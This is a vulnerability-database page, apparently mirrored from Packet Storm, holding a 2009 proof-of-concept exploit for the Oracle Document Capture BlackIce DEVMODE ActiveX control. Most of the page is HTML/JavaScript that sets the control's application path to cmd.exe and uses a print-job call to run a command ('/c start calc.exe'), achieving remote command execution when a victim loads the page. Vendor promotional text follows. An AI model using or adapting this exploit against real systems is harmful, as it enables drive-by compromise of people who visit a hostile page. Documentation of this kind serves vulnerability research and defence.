Lucene search
K

Oracle Document Capture BlackIce Command Execution

🗓️ 29 Sep 2009 00:00:00Reported by Nine:Situations:Group::pyrokinesisType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Oracle Document Capture BlackIce Command Execution vulnerability through ActiveX Contro

Code
`<!-- Oracle Document Capture BlackIce DEVMODE ActiveX Control remote command execution  
  
CLSID: {1503569A-0AE2-4333-B6E6-466AB0BC73E5}  
Progid: BLACKICEDEVMODE.BlackIceDEVMODECtrl.1  
Binary Path: C:\WINDOWS\system32\BlackIceDEVMODE.ocx  
Safe For Initialization (Registry): True  
Safe For Scripting (Registry): True  
-->  
<script language='javascript'>  
  
var BlackIce = new ActiveXObject("BLACKICEDEVMODE.BlackIceDEVMODECtrl.1");  
  
pBlackIceDEVMODE = BlackIce.LoadBlackIceDEVMODE ("Oracle Document Capture");  
  
BlackIce.EnableKeepExistingFiles (pBlackIceDEVMODE);  
BlackIce.EnableStartApplication (pBlackIceDEVMODE);  
BlackIce.EnableStartBeforePrint(pBlackIceDEVMODE);  
BlackIce.SetApplicationPath("c:\\windows\\system32\\cmd.exe",pBlackIceDEVMODE);  
BlackIce.EnablePassParameters(pBlackIceDEVMODE);  
BlackIce.SetStartApplicationParamCode(pBlackIceDEVMODE,1,6);  
BlackIce.SetCustomStartAppParameter(pBlackIceDEVMODE," /c start calc.exe");  
BlackIce.SaveBlackIceDEVMODE("Oracle Document Capture",pBlackIceDEVMODE);  
BlackIce.ControlJob("Oracle Document Capture",1,4); //JOB_CONTROL_PAUSE 1  
//JOB_CONTROL_RESUME 2  
//JOB_CONTROL_RESTART 4  
//JOB_CONTROL_DELETE 5  
</script>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Sep 2009 00:00Current
0.2Low risk
Vulners AI Score0.2
21